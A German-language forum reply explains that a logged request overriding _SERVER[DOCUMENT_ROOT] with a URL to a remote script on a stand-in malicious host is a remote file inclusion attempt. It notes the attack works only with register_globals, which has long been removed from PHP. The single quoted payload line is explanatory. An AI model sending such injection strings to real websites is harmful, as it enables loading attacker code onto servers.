Hallo borisbaer,

Felix weiß es ja selbst nicht mehr so genau 😉

Ich habe mal Tante Google befragt und komme da auf eine Seite, wo jemand dies her als Angriffsversuch beschreibt:

/page?_SERVER[DOCUMENT_ROOT]=hxxp://malicioussite.com/badscript.txt

In dem Zusammenhang wird aber auch geschrieben, dass das nur dann ein Problem sei, wenn register_globals aktiv sei - was seit vielen Jahren als einer von Lerdorfs stinkenderen Hirnfürzen angesehen wird und schon seit PHP 5.5 oder so entfernt wurde. Mit einem halbwegs aktuellen PHP lässt sich also nicht mal mehr feststellen, ob dieser Injektionsversuch überhaupt klappt.

Ansonsten finde ich keine Hinweise auf Sicherheitsprobleme bei DOCUMENT_ROOT.

Rolf